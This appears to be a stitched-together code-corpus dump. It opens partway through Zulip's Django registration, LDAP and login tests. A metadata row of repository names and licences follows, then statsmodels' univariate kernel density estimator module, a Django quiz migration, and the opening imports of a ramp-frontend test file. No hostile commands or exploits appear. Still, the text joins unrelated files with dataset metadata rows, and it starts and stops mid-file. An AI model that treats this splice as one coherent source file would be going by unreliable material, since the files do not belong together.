self.assertEqual(user_profile.full_name, 'New Name')
def test_realm_creation_through_ldap(self):
# type: () -> None
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
realm_name = "Zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': ['New User Name']
}
}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + "(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',),
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com',
TERMS_OF_SERVICE=False,
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
key = find_key_by_email(email),
confirmation = Confirmation.objects.get(confirmation_key=key[0])
prereg_user = confirmation.content_object
prereg_user.realm_creation = True
prereg_user.save()
result = self.submit_reg_form_for_user(email,
password,
realm_name=realm_name,
realm_subdomain=subdomain,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["You're almost there.",
"newuser@zulip.com"],
result)
mock_ldap.reset()
mock_initialize.stop()
@patch('DNS.dnslookup', return_value=[['sipbtest:*:20922:101:Fred Sipb,,,:/mit/sipbtest:/bin/athena/tcsh']])
def test_registration_of_mirror_dummy_user(self, ignored):
# type: (Any) -> None
password = "test"
subdomain = "zephyr"
user_profile = self.mit_user("sipbtest")
email = user_profile.email
user_profile.is_mirror_dummy = True
user_profile.is_active = False
user_profile.save()
result = self.client_post('/register/', {'email': email}, subdomain="zephyr")
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"], subdomain="zephyr")
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + "(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
result = self.client_get(confirmation_url, subdomain="zephyr")
self.assertEqual(result.status_code, 200)
# If the mirror dummy user is already active, attempting to submit the
# registration form should just redirect to a login page.
user_profile.is_active = True
user_profile.save()
result = self.submit_reg_form_for_user(email,
password,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
user_profile.is_active = False
user_profile.save()
result = self.submit_reg_form_for_user(email,
password,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_registration_of_active_mirror_dummy_user(self):
# type: (Any) -> None
"""
Trying to activate an already-active mirror dummy user should just
redirect to a login page.
"""
user_profile = self.mit_user("sipbtest")
email = user_profile.email
user_profile.is_mirror_dummy = True
user_profile.is_active = True
user_profile.save()
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
class DeactivateUserTest(ZulipTestCase):
def test_deactivate_user(self):
# type: () -> None
email = self.example_email("hamlet")
self.login(email)
user = self.example_user('hamlet')
self.assertTrue(user.is_active)
result = self.client_delete('/json/users/me')
self.assert_json_success(result)
user = self.example_user('hamlet')
self.assertFalse(user.is_active)
self.login(email, fails=True)
def test_do_not_deactivate_final_admin(self):
# type: () -> None
email = self.example_email("iago")
self.login(email)
user = self.example_user('iago')
self.assertTrue(user.is_active)
result = self.client_delete('/json/users/me')
self.assert_json_error(result, "Cannot deactivate the only organization administrator")
user = self.example_user('iago')
self.assertTrue(user.is_active)
self.assertTrue(user.is_realm_admin)
email = self.example_email("hamlet")
user_2 = self.example_user('hamlet')
do_change_is_admin(user_2, True)
self.assertTrue(user_2.is_realm_admin)
result = self.client_delete('/json/users/me')
self.assert_json_success(result)
do_change_is_admin(user, True)
class TestLoginPage(ZulipTestCase):
def test_login_page_wrong_subdomain_error(self):
# type: () -> None
result = self.client_get("/login/?subdomain=1")
self.assertIn(WRONG_SUBDOMAIN_ERROR, result.content.decode('utf8'))
@patch('django.http.HttpRequest.get_host')
def test_login_page_redirects_for_root_alias(self, mock_get_host):
# type: (MagicMock) -> None
mock_get_host.return_value = 'www.testserver'
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/')
@patch('django.http.HttpRequest.get_host')
def test_login_page_redirects_for_root_domain(self, mock_get_host):
# type: (MagicMock) -> None
mock_get_host.return_value = 'testserver'
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/')
mock_get_host.return_value = 'www.testserver.com'
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True,
EXTERNAL_HOST='www.testserver.com',
ROOT_SUBDOMAIN_ALIASES=['test']):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/')
@patch('django.http.HttpRequest.get_host')
def test_login_page_works_without_subdomains(self, mock_get_host):
# type: (MagicMock) -> None
mock_get_host.return_value = 'www.testserver'
with self.settings(ROOT_SUBDOMAIN_ALIASES=['www']):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
mock_get_host.return_value = 'testserver'
with self.settings(ROOT_SUBDOMAIN_ALIASES=['www']):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
class TestFindMyTeam(ZulipTestCase):
def test_template(self):
# type: () -> None
result = self.client_get('/accounts/find/')
self.assertIn("Find your Zulip accounts", result.content.decode('utf8'))
def test_result(self):
# type: () -> None
result = self.client_post('/accounts/find/',
dict(emails="iago@zulip.com,cordelia@zulip.com"))
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=iago%40zulip.com%2Ccordelia%40zulip.com")
result = self.client_get(result.url)
content = result.content.decode('utf8')
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn(self.example_email("iago"), content)
self.assertIn(self.example_email("cordelia"), content)
from django.core.mail import outbox
self.assertEqual(len(outbox), 2)
def test_find_team_ignore_invalid_email(self):
# type: () -> None
result = self.client_post('/accounts/find/',
dict(emails="iago@zulip.com,invalid_email@zulip.com"))
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=iago%40zulip.com%2Cinvalid_email%40zulip.com")
result = self.client_get(result.url)
content = result.content.decode('utf8')
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn(self.example_email("iago"), content)
self.assertIn("invalid_email@", content)
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
def test_find_team_reject_invalid_email(self):
# type: () -> None
result = self.client_post('/accounts/find/',
dict(emails="invalid_string"))
self.assertEqual(result.status_code, 200)
self.assertIn(b"Enter a valid email", result.content)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
# Just for coverage on perhaps-unnecessary validation code.
result = self.client_get('/accounts/find/?emails=invalid')
self.assertEqual(result.status_code, 200)
def test_find_team_zero_emails(self):
# type: () -> None
data = {'emails': ''}
result = self.client_post('/accounts/find/', data)
self.assertIn('This field is required', result.content.decode('utf8'))
self.assertEqual(result.status_code, 200)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_one_email(self):
# type: () -> None
data = {'emails': self.example_email("hamlet")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
def test_find_team_deactivated_user(self):
# type: () -> None
do_deactivate_user(self.example_user("hamlet"))
data = {'emails': self.example_email("hamlet")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_deactivated_realm(self):
# type: () -> None
do_deactivate_realm(get_realm("zulip"))
data = {'emails': self.example_email("hamlet")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_bot_email(self):
# type: () -> None
data = {'emails': self.example_email("webhook_bot")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=webhook-bot%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_more_than_ten_emails(self):
# type: () -> None
data = {'emails': ','.join(['hamlet-{}@zulip.com'.format(i) for i in range(11)])}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 200)
self.assertIn("Please enter at most 10", result.content.decode('utf8'))
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
class ConfirmationKeyTest(ZulipTestCase):
def test_confirmation_key(self):
# type: () -> None
request = MagicMock()
request.session = {
'confirmation_key': {'confirmation_key': 'xyzzy'}
}
result = confirmation_key(request)
self.assert_json_success(result)
self.assert_in_response('xyzzy', result)
class MobileAuthOTPTest(ZulipTestCase):
def test_xor_hex_strings(self):
# type: () -> None
self.assertEqual(xor_hex_strings('1237c81ab', '18989fd12'), '0aaf57cb9')
with self.assertRaises(AssertionError):
xor_hex_strings('1', '31')
def test_is_valid_otp(self):
# type: () -> None
self.assertEqual(is_valid_otp('1234'), False)
self.assertEqual(is_valid_otp('1234abcd' * 8), True)
self.assertEqual(is_valid_otp('1234abcZ' * 8), False)
def test_ascii_to_hex(self):
# type: () -> None
self.assertEqual(ascii_to_hex('ZcdR1234'), '5a63645231323334')
self.assertEqual(hex_to_ascii('5a63645231323334'), 'ZcdR1234')
def test_otp_encrypt_api_key(self):
# type: () -> None
hamlet = self.example_user('hamlet')
hamlet.api_key = '12ac' * 8
otp = '7be38894' * 8
result = otp_encrypt_api_key(hamlet, otp)
self.assertEqual(result, '4ad1e9f7' * 8)
decryped = otp_decrypt_api_key(result, otp)
self.assertEqual(decryped, hamlet.api_key)
class LoginOrAskForRegistrationTestCase(ZulipTestCase):
def test_confirm(self):
# type: () -> None
request = HostRequestMock()
email = 'new@zulip.com'
user_profile = None # type: Optional[UserProfile]
full_name = 'New User'
invalid_subdomain = False
result = login_or_register_remote_user(
request,
email,
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
self.assert_in_response('No account found for',
result)
self.assert_in_response('new@zulip.com. Would you like to register instead?',
result)
def test_invalid_subdomain(self):
# type: () -> None
request = HostRequestMock()
email = 'new@zulip.com'
user_profile = None # type: Optional[UserProfile]
full_name = 'New User'
invalid_subdomain = True
response = login_or_register_remote_user(
request,
email,
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
self.assertEqual(response.status_code, 302)
self.assertIn('/accounts/login/?subdomain=1', response.url)
def test_invalid_email(self):
# type: () -> None
request = HostRequestMock()
email = None # type: Optional[Text]
user_profile = None # type: Optional[UserProfile]
full_name = 'New User'
invalid_subdomain = False
response = login_or_register_remote_user(
request,
email,
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
self.assert_in_response('Please click the following button if '
'you wish to register', response)
def test_login_under_subdomains(self):
# type: () -> None
request = HostRequestMock()
setattr(request, 'session', self.client.session)
user_profile = self.example_user('hamlet')
user_profile.backend = 'zproject.backends.GitHubAuthBackend'
full_name = 'Hamlet'
invalid_subdomain = False
response = login_or_register_remote_user(
request,
user_profile.email,
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
user_id = get_session_dict_user(getattr(request, 'session'))
self.assertEqual(user_id, user_profile.id)
self.assertEqual(response.status_code, 302)
self.assertIn('http://zulip.testserver', response.url)
| 43.144387
| 114
| 0.615676
|
2658b95c4370ce6c5bbd24abe6c558ae24902a26
| 18,447
|
py
|
Python
|
statsmodels/nonparametric/kde.py
|
ginggs/statsmodels
|
a74a179d2a3267ed992871f8d9ef6c6d86c9b934
|
[
"BSD-3-Clause"
] | 6
|
2019-12-26T08:34:44.000Z
|
2021-05-05T03:10:06.000Z
|
statsmodels/nonparametric/kde.py
|
ginggs/statsmodels
|
a74a179d2a3267ed992871f8d9ef6c6d86c9b934
|
[
"BSD-3-Clause"
] | 1
|
2019-07-29T08:35:08.000Z
|
2019-07-29T08:35:08.000Z
|
statsmodels/nonparametric/kde.py
|
ginggs/statsmodels
|
a74a179d2a3267ed992871f8d9ef6c6d86c9b934
|
[
"BSD-3-Clause"
] | 4
|
2020-04-07T00:06:17.000Z
|
2021-06-17T15:11:36.000Z
|
"""
Univariate Kernel Density Estimators
References
----------
Racine, Jeff. (2008) "Nonparametric Econometrics: A Primer," Foundation and
Trends in Econometrics: Vol 3: No 1, pp1-88.
http://dx.doi.org/10.1561/0800000009
https://en.wikipedia.org/wiki/Kernel_%28statistics%29
Silverman, B.W. Density Estimation for Statistics and Data Analysis.
"""
import numpy as np
from scipy import integrate, stats
from statsmodels.sandbox.nonparametric import kernels
from statsmodels.tools.decorators import cache_readonly
from . import bandwidths
from .kdetools import (forrt, revrt, silverman_transform)
from .linbin import fast_linbin
#### Kernels Switch for estimators ####
kernel_switch = dict(gau=kernels.Gaussian, epa=kernels.Epanechnikov,
uni=kernels.Uniform, tri=kernels.Triangular,
biw=kernels.Biweight, triw=kernels.Triweight,
cos=kernels.Cosine, cos2=kernels.Cosine2)
def _checkisfit(self):
try:
self.density
except:
raise ValueError("Call fit to fit the density first")
#### Kernel Density Estimator Class ###
class KDEUnivariate(object):
"""
Univariate Kernel Density Estimator.
Parameters
----------
endog : array_like
The variable for which the density estimate is desired.
Notes
-----
If cdf, sf, cumhazard, or entropy are computed, they are computed based on
the definition of the kernel rather than the FFT approximation, even if
the density is fit with FFT = True.
`KDEUnivariate` is much faster than `KDEMultivariate`, due to its FFT-based
implementation. It should be preferred for univariate, continuous data.
`KDEMultivariate` also supports mixed data.
See Also
--------
KDEMultivariate
kdensity, kdensityfft
Examples
--------
>>> import statsmodels.api as sm
>>> import matplotlib.pyplot as plt
>>> nobs = 300
>>> np.random.seed(1234) # Seed random generator
>>> dens = sm.nonparametric.KDEUnivariate(np.random.normal(size=nobs))
>>> dens.fit()
>>> plt.plot(dens.cdf)
>>> plt.show()
"""
def __init__(self, endog):
self.endog = np.asarray(endog)
def fit(self, kernel="gau", bw="normal_reference", fft=True, weights=None,
gridsize=None, adjust=1, cut=3, clip=(-np.inf, np.inf)):
"""
Attach the density estimate to the KDEUnivariate class.
Parameters
----------
kernel : str
The Kernel to be used. Choices are:
- "biw" for biweight
- "cos" for cosine
- "epa" for Epanechnikov
- "gau" for Gaussian.
- "tri" for triangular
- "triw" for triweight
- "uni" for uniform
bw : str, float
The bandwidth to use. Choices are:
- "scott" - 1.059 * A * nobs ** (-1/5.), where A is
`min(std(X),IQR/1.34)`
- "silverman" - .9 * A * nobs ** (-1/5.), where A is
`min(std(X),IQR/1.34)`
- "normal_reference" - C * A * nobs ** (-1/5.), where C is
calculated from the kernel. Equivalent (up to 2 dp) to the
"scott" bandwidth for gaussian kernels. See bandwidths.py
- If a float is given, it is the bandwidth.
fft : bool
Whether or not to use FFT. FFT implementation is more
computationally efficient. However, only the Gaussian kernel
is implemented. If FFT is False, then a 'nobs' x 'gridsize'
intermediate array is created.
gridsize : int
If gridsize is None, max(len(X), 50) is used.
cut : float
Defines the length of the grid past the lowest and highest values
of X so that the kernel goes to zero. The end points are
-/+ cut*bw*{min(X) or max(X)}
adjust : float
An adjustment factor for the bw. Bandwidth becomes bw * adjust.
"""
try:
bw = float(bw)
self.bw_method = "user-given"
except:
self.bw_method = bw
endog = self.endog
if fft:
if kernel != "gau":
msg = "Only gaussian kernel is available for fft"
raise NotImplementedError(msg)
if weights is not None:
msg = "Weights are not implemented for fft"
raise NotImplementedError(msg)
density, grid, bw = kdensityfft(endog, kernel=kernel, bw=bw,
adjust=adjust, weights=weights, gridsize=gridsize,
clip=clip, cut=cut)
else:
density, grid, bw = kdensity(endog, kernel=kernel, bw=bw,
adjust=adjust, weights=weights, gridsize=gridsize,
clip=clip, cut=cut)
self.density = density
self.support = grid
self.bw = bw
self.kernel = kernel_switch[kernel](h=bw) # we instantiate twice,
# should this passed to funcs?
# put here to ensure empty cache after re-fit with new options
self.kernel.weights = weights
if weights is not None:
self.kernel.weights /= weights.sum()
self._cache = {}
@cache_readonly
def cdf(self):
"""
Returns the cumulative distribution function evaluated at the support.
Notes
-----
Will not work if fit has not been called.
"""
_checkisfit(self)
kern = self.kernel
if kern.domain is None: # TODO: test for grid point at domain bound
a,b = -np.inf,np.inf
else:
a,b = kern.domain
func = lambda x,s: kern.density(s,x)
support = self.support
support = np.r_[a,support]
gridsize = len(support)
endog = self.endog
probs = [integrate.quad(func, support[i - 1], support[i],
args=endog)[0] for i in range(1, gridsize)]
return np.cumsum(probs)
@cache_readonly
def cumhazard(self):
"""
Returns the hazard function evaluated at the support.
Notes
-----
Will not work if fit has not been called.
"""
_checkisfit(self)
return -np.log(self.sf)
@cache_readonly
def sf(self):
"""
Returns the survival function evaluated at the support.
Notes
-----
Will not work if fit has not been called.
"""
_checkisfit(self)
return 1 - self.cdf
@cache_readonly
def entropy(self):
"""
Returns the differential entropy evaluated at the support
Notes
-----
Will not work if fit has not been called. 1e-12 is added to each
probability to ensure that log(0) is not called.
"""
_checkisfit(self)
def entr(x,s):
pdf = kern.density(s,x)
return pdf*np.log(pdf+1e-12)
kern = self.kernel
if kern.domain is not None:
a, b = self.domain
else:
a, b = -np.inf, np.inf
endog = self.endog
#TODO: below could run into integr problems, cf. stats.dist._entropy
return -integrate.quad(entr, a, b, args=(endog,))[0]
@cache_readonly
def icdf(self):
"""
Inverse Cumulative Distribution (Quantile) Function
Notes
-----
Will not work if fit has not been called. Uses
`scipy.stats.mstats.mquantiles`.
"""
_checkisfit(self)
gridsize = len(self.density)
return stats.mstats.mquantiles(self.endog, np.linspace(0, 1, gridsize))
def evaluate(self, point):
"""
Evaluate density at a single point.
Parameters
----------
point : float
Point at which to evaluate the density.
"""
_checkisfit(self)
return self.kernel.density(self.endog, point)
#### Kernel Density Estimator Functions ####
def kdensity(X, kernel="gau", bw="normal_reference", weights=None, gridsize=None,
adjust=1, clip=(-np.inf, np.inf), cut=3, retgrid=True):
"""
Rosenblatt-Parzen univariate kernel density estimator.
Parameters
----------
X : array_like
The variable for which the density estimate is desired.
kernel : str
The Kernel to be used. Choices are
- "biw" for biweight
- "cos" for cosine
- "epa" for Epanechnikov
- "gau" for Gaussian.
- "tri" for triangular
- "triw" for triweight
- "uni" for uniform
bw : str, float
"scott" - 1.059 * A * nobs ** (-1/5.), where A is min(std(X),IQR/1.34)
"silverman" - .9 * A * nobs ** (-1/5.), where A is min(std(X),IQR/1.34)
If a float is given, it is the bandwidth.
weights : array or None
Optional weights. If the X value is clipped, then this weight is
also dropped.
gridsize : int
If gridsize is None, max(len(X), 50) is used.
adjust : float
An adjustment factor for the bw. Bandwidth becomes bw * adjust.
clip : tuple
Observations in X that are outside of the range given by clip are
dropped. The number of observations in X is then shortened.
cut : float
Defines the length of the grid past the lowest and highest values of X
so that the kernel goes to zero. The end points are
-/+ cut*bw*{min(X) or max(X)}
retgrid : bool
Whether or not to return the grid over which the density is estimated.
Returns
-------
density : array
The densities estimated at the grid points.
grid : array, optional
The grid points at which the density is estimated.
Notes
-----
Creates an intermediate (`gridsize` x `nobs`) array. Use FFT for a more
computationally efficient version.
"""
X = np.asarray(X)
if X.ndim == 1:
X = X[:, None]
clip_x = np.logical_and(X > clip[0], X < clip[1])
X = X[clip_x]
nobs = len(X) # after trim
if gridsize is None:
gridsize = max(nobs,50) # do not need to resize if no FFT
# handle weights
if weights is None:
weights = np.ones(nobs)
q = nobs
else:
# ensure weights is a numpy array
weights = np.asarray(weights)
if len(weights) != len(clip_x):
msg = "The length of the weights must be the same as the given X."
raise ValueError(msg)
weights = weights[clip_x.squeeze()]
q = weights.sum()
# Get kernel object corresponding to selection
kern = kernel_switch[kernel]()
# if bw is None, select optimal bandwidth for kernel
try:
bw = float(bw)
except:
bw = bandwidths.select_bandwidth(X, bw, kern)
bw *= adjust
a = np.min(X, axis=0) - cut * bw
b = np.max(X, axis=0) + cut * bw
grid = np.linspace(a, b, gridsize)
k = (X.T - grid[:, None])/bw # uses broadcasting to make a gridsize x nobs
# set kernel bandwidth
kern.seth(bw)
# truncate to domain
if kern.domain is not None: # will not work for piecewise kernels like parzen
z_lo, z_high = kern.domain
domain_mask = (k < z_lo) | (k > z_high)
k = kern(k) # estimate density
k[domain_mask] = 0
else:
k = kern(k) # estimate density
k[k < 0] = 0 # get rid of any negative values, do we need this?
dens = np.dot(k, weights)/(q*bw)
if retgrid:
return dens, grid, bw
else:
return dens, bw
def kdensityfft(X, kernel="gau", bw="normal_reference", weights=None, gridsize=None,
adjust=1, clip=(-np.inf, np.inf), cut=3, retgrid=True):
"""
Rosenblatt-Parzen univariate kernel density estimator
Parameters
----------
X : array_like
The variable for which the density estimate is desired.
kernel : str
ONLY GAUSSIAN IS CURRENTLY IMPLEMENTED.
"bi" for biweight
"cos" for cosine
"epa" for Epanechnikov, default
"epa2" for alternative Epanechnikov
"gau" for Gaussian.
"par" for Parzen
"rect" for rectangular
"tri" for triangular
bw : str, float
"scott" - 1.059 * A * nobs ** (-1/5.), where A is min(std(X),IQR/1.34)
"silverman" - .9 * A * nobs ** (-1/5.), where A is min(std(X),IQR/1.34)
If a float is given, it is the bandwidth.
weights : array or None
WEIGHTS ARE NOT CURRENTLY IMPLEMENTED.
Optional weights. If the X value is clipped, then this weight is
also dropped.
gridsize : int
If gridsize is None, min(len(X), 512) is used. Note that the provided
number is rounded up to the next highest power of 2.
adjust : float
An adjustment factor for the bw. Bandwidth becomes bw * adjust.
clip : tuple
Observations in X that are outside of the range given by clip are
dropped. The number of observations in X is then shortened.
cut : float
Defines the length of the grid past the lowest and highest values of X
so that the kernel goes to zero. The end points are
-/+ cut*bw*{X.min() or X.max()}
retgrid : bool
Whether or not to return the grid over which the density is estimated.
Returns
-------
density : array
The densities estimated at the grid points.
grid : array, optional
The grid points at which the density is estimated.
Notes
-----
Only the default kernel is implemented. Weights are not implemented yet.
This follows Silverman (1982) with changes suggested by Jones and Lotwick
(1984). However, the discretization step is replaced by linear binning
of Fan and Marron (1994). This should be extended to accept the parts
that are dependent only on the data to speed things up for
cross-validation.
References
----------
Fan, J. and J.S. Marron. (1994) `Fast implementations of nonparametric
curve estimators`. Journal of Computational and Graphical Statistics.
3.1, 35-56.
Jones, M.C. and H.W. Lotwick. (1984) `Remark AS R50: A Remark on Algorithm
AS 176. Kernal Density Estimation Using the Fast Fourier Transform`.
Journal of the Royal Statistical Society. Series C. 33.1, 120-2.
Silverman, B.W. (1982) `Algorithm AS 176. Kernel density estimation using
the Fast Fourier Transform. Journal of the Royal Statistical Society.
Series C. 31.2, 93-9.
"""
X = np.asarray(X)
X = X[np.logical_and(X > clip[0], X < clip[1])] # will not work for two columns.
# will affect underlying data?
# Get kernel object corresponding to selection
kern = kernel_switch[kernel]()
try:
bw = float(bw)
except:
bw = bandwidths.select_bandwidth(X, bw, kern) # will cross-val fit this pattern?
bw *= adjust
nobs = len(X) # after trim
# 1 Make grid and discretize the data
if gridsize is None:
gridsize = np.max((nobs, 512.))
gridsize = 2**np.ceil(np.log2(gridsize)) # round to next power of 2
a = np.min(X) - cut * bw
b = np.max(X) + cut * bw
grid,delta = np.linspace(a, b, int(gridsize), retstep=True)
RANGE = b - a
#TODO: Fix this?
# This is the Silverman binning function, but I believe it's buggy (SS)
# weighting according to Silverman
# count = counts(X,grid)
# binned = np.zeros_like(grid) #xi_{k} in Silverman
# j = 0
# for k in range(int(gridsize-1)):
# if count[k]>0: # there are points of X in the grid here
# Xingrid = X[j:j+count[k]] # get all these points
# # get weights at grid[k],grid[k+1]
# binned[k] += np.sum(grid[k+1]-Xingrid)
# binned[k+1] += np.sum(Xingrid-grid[k])
# j += count[k]
# binned /= (nobs)*delta**2 # normalize binned to sum to 1/delta
#NOTE: THE ABOVE IS WRONG, JUST TRY WITH LINEAR BINNING
binned = fast_linbin(X, a, b, gridsize) / (delta * nobs)
# step 2 compute FFT of the weights, using Munro (1976) FFT convention
y = forrt(binned)
# step 3 and 4 for optimal bw compute zstar and the density estimate f
# do not have to redo the above if just changing bw, ie., for cross val
#NOTE: silverman_transform is the closed form solution of the FFT of the
#gaussian kernel. Not yet sure how to generalize it.
zstar = silverman_transform(bw, gridsize, RANGE)*y # 3.49 in Silverman
# 3.50 w Gaussian kernel
f = revrt(zstar)
if retgrid:
return f, grid, bw
else:
return f, bw
if __name__ == "__main__":
import numpy as np
np.random.seed(12345)
xi = np.random.randn(100)
f,grid, bw1 = kdensity(xi, kernel="gau", bw=.372735, retgrid=True)
f2, bw2 = kdensityfft(xi, kernel="gau", bw="silverman",retgrid=False)
# do some checking vs. silverman algo.
# you need denes.f, http://lib.stat.cmu.edu/apstat/176
#NOTE: I (SS) made some changes to the Fortran
# and the FFT stuff from Munro http://lib.stat.cmu.edu/apstat/97o
# then compile everything and link to denest with f2py
#Make pyf file as usual, then compile shared object
#f2py denest.f -m denest2 -h denest.pyf
#edit pyf
#-c flag makes it available to other programs, fPIC builds a shared library
#/usr/bin/gfortran -Wall -c -fPIC fft.f
#f2py -c denest.pyf ./fft.o denest.f
try:
from denest2 import denest # @UnresolvedImport
a = -3.4884382032045504
b = 4.3671504686785605
RANGE = b - a
bw = bandwidths.bw_silverman(xi)
ft,smooth,ifault,weights,smooth1 = denest(xi,a,b,bw,np.zeros(512),np.zeros(512),0,
np.zeros(512), np.zeros(512))
# We use a different binning algo, so only accurate up to 3 decimal places
np.testing.assert_almost_equal(f2, smooth, 3)
#NOTE: for debugging
# y2 = forrt(weights)
# RJ = np.arange(512/2+1)
# FAC1 = 2*(np.pi*bw/RANGE)**2
# RJFAC = RJ**2*FAC1
# BC = 1 - RJFAC/(6*(bw/((b-a)/M))**2)
# FAC = np.exp(-RJFAC)/BC
# SMOOTH = np.r_[FAC,FAC[1:-1]] * y2
# dens = revrt(SMOOTH)
except:
# ft = np.loadtxt('./ft_silver.csv')
# smooth = np.loadtxt('./smooth_silver.csv')
print("Did not get the estimates from the Silverman algorithm")
| 33.662409
| 90
| 0.596032
|
e9337abe06d52be9cadfc15c31642a3d078896b6
| 512
|
py
|
Python
|
quiz_api/quizzes/migrations/0015_auto_20201130_0344.py
|
vldslv/quiz_api
|
64e5f0f6fe03a532e21409940ad3890eaab8052a
|
[
"BSD-3-Clause"
] | null | null | null |
quiz_api/quizzes/migrations/0015_auto_20201130_0344.py
|
vldslv/quiz_api
|
64e5f0f6fe03a532e21409940ad3890eaab8052a
|
[
"BSD-3-Clause"
] | null | null | null |
quiz_api/quizzes/migrations/0015_auto_20201130_0344.py
|
vldslv/quiz_api
|
64e5f0f6fe03a532e21409940ad3890eaab8052a
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 2.2.1 on 2020-11-30 00:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('quizzes', '0014_question_answer_type'),
]
operations = [
migrations.AlterField(
model_name='question',
name='answer_type',
field=models.IntegerField(choices=[(1, 'Текстовое поле'), (2, 'Выбор одного варианта'), (3, 'Множественный выбор')], default=1, verbose_name='Тип ответа'),
),
]
| 26.947368
| 167
| 0.625
|
55fbfeb7bbd0d691b5fefb56fba286cb0f4976f1
| 12,477
|
py
|
Python
|
ramp-frontend/ramp_frontend/tests/test_admin.py
|
frcaud/ramp-board
|
3df90e51a4faeb0c03bab5dc13e12311807a618e
|
[
"BSD-3-Clause"
] | null | null | null |
ramp-frontend/ramp_frontend/tests/test_admin.py
|
frcaud/ramp-board
|
3df90e51a4faeb0c03bab5dc13e12311807a618e
|
[
"BSD-3-Clause"
] | null | null | null |
ramp-frontend/ramp_frontend/tests/test_admin.py
|
frcaud/ramp-board
|
3df90e51a4faeb0c03bab5dc13e12311807a618e
|
[
"BSD-3-Clause"
] | null | null | null |
import re
import shutil
import pytest
from werkzeug.datastructures import ImmutableMultiDict
from ramp_utils import generate_flask_config
from ramp_utils import read_config
from ramp_utils.testing import database_config_template
from ramp_utils.testing import ramp_config_template
from ramp_database.model import Model
from ramp_database.testing import create_toy_db
from ramp_database.utils import setup_db
from ramp_database.utils import session_scope
from ramp_database.tools.event import get_event
from ramp_database.tools.user import add_user
